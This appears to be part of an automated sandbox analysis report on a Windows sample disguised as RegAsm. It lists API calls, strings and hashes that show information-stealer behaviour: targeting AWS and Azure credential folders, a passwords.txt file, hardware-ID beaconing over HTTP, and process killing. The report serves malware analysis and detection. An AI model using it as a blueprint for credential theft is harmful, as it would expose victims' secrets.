                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,004251E8,?,00000000,00425200), ref: 00408450
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004084C9
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004084D0
                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040856A
                                                    • lstrcatA.KERNEL32(?), ref: 0040858F
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004085A1
                                                    • lstrcatA.KERNEL32(?,00428E50), ref: 004085AF
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004085C1
                                                    • lstrcatA.KERNEL32(?,00428E4C), ref: 004085CF
                                                    • lstrcatA.KERNEL32(?), ref: 004085DE
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004085F0
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 004085FE
                                                    • lstrcatA.KERNEL32(?), ref: 0040860D
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040861F
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040862D
                                                    • lstrcatA.KERNEL32(?), ref: 0040863C
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040864E
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040865C
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 0040866A
                                                    • lstrlenA.KERNEL32(?), ref: 00408688
                                                    • memset.MSVCRT ref: 004086D4
                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408701
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 004135B9: memset.MSVCRT ref: 004135D4
                                                      • Part of subcall function 004135B9: OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041368A
                                                      • Part of subcall function 004135B9: TerminateProcess.KERNEL32(00000000,00000000), ref: 004136A7
                                                      • Part of subcall function 004135B9: CloseHandle.KERNEL32(00000000), ref: 004136B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyDeleteHandleOpenSystemTerminateTime
                                                    • String ID: passwords.txt
                                                    • API String ID: 1737540870-347816968
                                                    • Opcode ID: e7516f4a65ce10130fd093f07ba65f7fdb76d7e0e32bba32449652ac384407af
                                                    • Instruction ID: 4868cb4a0c5d8df9b0255056c1bbdf5f8baa826a61240bfbc382e0845978a72e
                                                    • Opcode Fuzzy Hash: e7516f4a65ce10130fd093f07ba65f7fdb76d7e0e32bba32449652ac384407af
                                                    • Instruction Fuzzy Hash: 00A11972900108AFDF05EBA1ED5AAED7B79FF15305F60502AF112B10B1EF3A5A44CB69

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004138BA: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004138F5
                                                      • Part of subcall function 004138BA: Process32First.KERNEL32(00429888,00000128), ref: 00413908
                                                      • Part of subcall function 004138BA: Process32Next.KERNEL32(00429888,00000128), ref: 0041391C
                                                      • Part of subcall function 004138BA: StrCmpCA.SHLWAPI(?,0042988C), ref: 00413930
                                                      • Part of subcall function 004138BA: FindCloseChangeNotification.KERNEL32(00429888), ref: 00413943
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,?,?,00425200,00000000), ref: 00419657
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041972D
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419747
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00411948: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00411964
                                                      • Part of subcall function 00411948: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004119A1
                                                      • Part of subcall function 00411948: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411A18
                                                      • Part of subcall function 00411948: HeapAlloc.KERNEL32(00000000), ref: 00411A1F
                                                      • Part of subcall function 004043FA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404492
                                                      • Part of subcall function 004043FA: StrCmpCA.SHLWAPI(?), ref: 004044B2
                                                      • Part of subcall function 00414F8C: StrCmpCA.SHLWAPI(00000000,block), ref: 00414FB1
                                                      • Part of subcall function 00414F8C: ExitProcess.KERNEL32 ref: 00414FBD
                                                      • Part of subcall function 0040F99F: StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040F9EF
                                                      • Part of subcall function 0040F99F: StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FA75
                                                      • Part of subcall function 004058C4: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040595F
                                                      • Part of subcall function 004058C4: StrCmpCA.SHLWAPI(?), ref: 00405975
                                                      • Part of subcall function 0041497B: strtok_s.MSVCRT ref: 004149A3
                                                      • Part of subcall function 0041497B: strtok_s.MSVCRT ref: 00414A94
                                                      • Part of subcall function 00417B07: lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00417B40
                                                      • Part of subcall function 00417B07: lstrcatA.KERNEL32(?), ref: 00417B5E
                                                    • Sleep.KERNEL32(000003E8), ref: 00419AFA
                                                      • Part of subcall function 00417C93: memset.MSVCRT ref: 00417CAA
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,00000000), ref: 00417CD1
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,\.azure\), ref: 00417CEE
                                                      • Part of subcall function 00417C93: memset.MSVCRT ref: 00417D2E
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,00000000), ref: 00417D55
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,\.aws\), ref: 00417D72
                                                      • Part of subcall function 00417C93: memset.MSVCRT ref: 00417DB2
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,00000000), ref: 00417DD9
                                                      • Part of subcall function 00417C93: lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00417DF6
                                                      • Part of subcall function 00404E03: lstrlenA.KERNEL32(00000000), ref: 00404E8B
                                                      • Part of subcall function 00404E03: StrCmpCA.SHLWAPI(?,00425200,00425200,00425200,00425200), ref: 00404EEF
                                                      • Part of subcall function 00404E03: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$InternetOpenlstrcpy$lstrlenmemset$CreateDirectoryHeapProcessProcess32strtok_s$AllocChangeCloseExitFindFirstInformationNextNotificationSleepSnapshotToolhelp32VolumeWindows
                                                    • String ID: .exe$2$2$_DEBUG.zip$arp$d$d$d$d$d$d$dabl$http://$org$tea
                                                    • API String ID: 4021577771-4025179836
                                                    • Opcode ID: d8ddd20c65dbe4accbe59cdc2a04e807221df0d548ce8610666dd4a4d36cae5e
                                                    • Instruction ID: 114828df09490f9f1d13115ca2c7a84a7d1e175cc6150afb538a57f6698be508
                                                    • Opcode Fuzzy Hash: d8ddd20c65dbe4accbe59cdc2a04e807221df0d548ce8610666dd4a4d36cae5e
                                                    • Instruction Fuzzy Hash: 93B22F71D041289ADB14FB61DC96ADDB778AB11304F5440EAE50EA21A1DF3C6FC8CF69

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004118F6: StrCmpCA.SHLWAPI(?,?), ref: 00411913
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408A97
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00408A9E
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,004251E8,?,00000000,00425200), ref: 00408885
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                    • lstrcatA.KERNEL32(?,00000000,00000000,00428E58,00428E58,00000000), ref: 00408BCD
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408BDB
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408BED
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408BFB
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C0D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C1B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C2D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C3B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C4D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C5B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C6D
                                                    • lstrcatA.KERNEL32(?,00428E54), ref: 00408C7B
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408CBD
                                                    • lstrcatA.KERNEL32(?,00428E48), ref: 00408CD6
                                                    • lstrlenA.KERNEL32(?), ref: 00408D14
                                                    • lstrlenA.KERNEL32(?), ref: 00408D22
                                                    • memset.MSVCRT ref: 00408D6D
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408D92
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemset
                                                    • String ID:
                                                    • API String ID: 1498849721-0
                                                    • Opcode ID: 9e96b593e49dfbaf82baf5f3f7b14edd2bd44551348f714d62c2555fbf218532
                                                    • Instruction ID: 75b67620860664da6d1f04eed94d7d10b36c4f27a8908ca0f5e9c5d632b00ffa
                                                    • Opcode Fuzzy Hash: 9e96b593e49dfbaf82baf5f3f7b14edd2bd44551348f714d62c2555fbf218532
                                                    • Instruction Fuzzy Hash: 02021D71900109AADB05FBA1ED56EEE7779EF11309F50406AF216B10F1EF395A88CB68

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: T$U
                                                    • API String ID: 0-2115836835
                                                    • Opcode ID: 10f69da23589928bea78b6bdb87915afbf723c228a04615c940d6145975852ec
                                                    • Instruction ID: 4e7ab3bbaac243ee1ce136935939dafd3e3fd9ddb02e4ea4b8407d5d40478ec4
                                                    • Opcode Fuzzy Hash: 10f69da23589928bea78b6bdb87915afbf723c228a04615c940d6145975852ec
                                                    • Instruction Fuzzy Hash: 626218B4A042A9CFDB20CF54D884BE9B7B4AF14305F5440DBEA09A7252D7389E89CF59

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404492
                                                    • StrCmpCA.SHLWAPI(?), ref: 004044B2
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040462C
                                                    • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00404682
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004046BA
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00425200,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040497C
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404998
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004049AB
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004049D5
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A38
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A4F
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                    • String ID: "$------$build_id$hwid
                                                    • API String ID: 3006978581-50533134
                                                    • Opcode ID: cceb3a196459d883b403675918582489495ab2fed22875715751cb834377af79
                                                    • Instruction ID: 067cb1f7702ceabbac9578a1173a021fc80b9e748851ef74f8b32e742b117f95
                                                    • Opcode Fuzzy Hash: cceb3a196459d883b403675918582489495ab2fed22875715751cb834377af79
                                                    • Instruction Fuzzy Hash: 22124E71900218AADB15EBA1DD92FDEB379BF15305F5000AAF216B21E1DF386B88CF54

                                                    Control-flow Graph

                                                    APIs
                                                    • CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4), ref: 004127D9
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00428E48,00000000,?), ref: 004127F1
                                                    • CoCreateInstance.OLE32(0042AE78,00000000,00000001,0042ADA8,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ), ref: 0041280D
                                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,00428E48,00000000,?,00000000), ref: 00412855
                                                    • VariantInit.OLEAUT32(?), ref: 004128C1
                                                    • FileTimeToSystemTime.KERNEL32(?,00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000), ref: 004128FA
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000), ref: 00412907
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000), ref: 0041290E
                                                    • wsprintfA.USER32 ref: 0041293D
                                                    • VariantClear.OLEAUT32(?), ref: 00412955
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HeapInitializeTimeVariant$AllocBlanketClearCreateFileInitInstanceProcessProxySecuritySystemwsprintf
                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
                                                    • API String ID: 1977436990-271508173
                                                    • Opcode ID: ba33cfd2da918b761e9130eb7da6f96fb9872cbbfcfe80a5cabb4ca5af105773
                                                    • Instruction ID: b87b7ae96d8d1a7714e06012ec36ed585f0f60198b44980e8310200412a3d949
                                                    • Opcode Fuzzy Hash: ba33cfd2da918b761e9130eb7da6f96fb9872cbbfcfe80a5cabb4ca5af105773
                                                    • Instruction Fuzzy Hash: B561F671A40218BFDB10DB94DD46FEDBBB8BB08B11F604116F611FA1D0C7B8A991CB69
                                                    APIs
                                                    Strings
                                                    • Ici Radio-Canada Tl (stylized as ICI Radio-Canada Tl, and sometimes abbreviated as Ici Tl) is a Canadian French-language fre, xrefs: 0040428E, 004042FE
                                                    • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 004042C5
                                                    • Niedert is an Ortsgemeinde , xrefs: 00404283, 004042F3
                                                    • Organ perforation is a complete penetration of the wall of a hollow organ in the body, such as the gastrointestinal tract in the c, xrefs: 00404278, 004042E8
                                                    • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 004042D0
                                                    • Chrysorabdia bivitta is a moth of the subfamily Arctiinae first described by Francis Walker in 1856., xrefs: 0040426D, 004042DD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wcslen$AllocLocalstrlen
                                                    • String ID: Chrysorabdia bivitta is a moth of the subfamily Arctiinae first described by Francis Walker in 1856.$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$Ici Radio-Canada Tl (stylized as ICI Radio-Canada Tl, and sometimes abbreviated as Ici Tl) is a Canadian French-language fre$Niedert is an Ortsgemeinde $Organ perforation is a complete penetration of the wall of a hollow organ in the body, such as the gastrointestinal tract in the c$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser
                                                    • API String ID: 224765317-2971033767
                                                    • Opcode ID: b2908c616810051979d5b7c1935cb1d71aeefb77bac9279ab48edbe17b9693c0
                                                    • Instruction ID: 15c8a1cfb45bc9c132fd9fd4faededd5fc4f4c62c30039555f1f88a1b54c1e58
                                                    • Opcode Fuzzy Hash: b2908c616810051979d5b7c1935cb1d71aeefb77bac9279ab48edbe17b9693c0
                                                    • Instruction Fuzzy Hash: 9A213071785268AFDB04EBE9F8C7B5CBBE4EFD4714FA0006FF40496191DEB869408619
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404B22
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00404B29
                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404B54
                                                    • StrCmpCA.SHLWAPI(?), ref: 00404B6D
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BA1
                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 00404C00
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00404C38
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C49
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00404C74
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404D05
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404D9B
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404DA7
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404DC5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                    • String ID: GET
                                                    • API String ID: 442264750-1805413626
                                                    • Opcode ID: f16c31e6c77223db1b221cad6f523a7c8a9ce9fa98b564ab69779ee6bb960051
                                                    • Instruction ID: d037288fe89579f4ab5843d1a5928f681561e61fb867290b5a494df79b11f7d7
                                                    • Opcode Fuzzy Hash: f16c31e6c77223db1b221cad6f523a7c8a9ce9fa98b564ab69779ee6bb960051
                                                    • Instruction Fuzzy Hash: 769115B4900228AFDF20DF50DC45BEEB7B5BB45306F1040EAE609B6291DB796AC4DF49
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406373
                                                    • StrCmpCA.SHLWAPI(?), ref: 00406390
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004063BE
                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 0040640A
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406442
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406453
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040647E
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064F3
                                                    • InternetCloseHandle.WININET(00000000), ref: 0040657C
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406585
                                                    • InternetCloseHandle.WININET(00000000), ref: 0040658E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                    • String ID: ERROR$GET
                                                    • API String ID: 3749127164-3591763792
                                                    • Opcode ID: 963ac1e056751af433d780a8216807e69140fad55e256c3b4c315ddae2ff65c2
                                                    • Instruction ID: 51cd531d8c454c4eabdc451ce72ca3cccbe2bef7883915b0542a7032e80e54d3
                                                    • Opcode Fuzzy Hash: 963ac1e056751af433d780a8216807e69140fad55e256c3b4c315ddae2ff65c2
                                                    • Instruction Fuzzy Hash: 9E710871900218EFDF21EFA0DC45BDD7B75AB05305F6040AAF606BA1E0DBB96A94CF49
                                                    APIs
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004182BD
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418321
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00417E48: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00417E8B
                                                      • Part of subcall function 00417F35: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00417F96
                                                      • Part of subcall function 00417F35: lstrlenA.KERNEL32(00000000), ref: 00417FAD
                                                      • Part of subcall function 00417F35: StrStrA.SHLWAPI(00000000,00000000), ref: 00417FDD
                                                      • Part of subcall function 00417F35: lstrlenA.KERNEL32(00000000), ref: 00417FF9
                                                      • Part of subcall function 00417F35: lstrlenA.KERNEL32(00000000), ref: 0041801F
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041840E
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418519
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00418606
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418711
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004187FE
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418909
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418B01
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlen
                                                    • String ID: ERROR
                                                    • API String ID: 2001356338-2861137601
                                                    • Opcode ID: 601a58bd0b0876066a53ea39e9bf7ef070bc13c226733b0f19d5a4e6bce83ed6
                                                    • Instruction ID: 2f695ca300a8a73312befe9c8800e9116e76318d555d5372ca32ba18f7f60556
                                                    • Opcode Fuzzy Hash: 601a58bd0b0876066a53ea39e9bf7ef070bc13c226733b0f19d5a4e6bce83ed6
                                                    • Instruction Fuzzy Hash: 2D4232719001085ACB14FBF1ED5B9EE7378AF10305F90416FF516A61E2EF7C9A88CA99
                                                    APIs
                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00411964
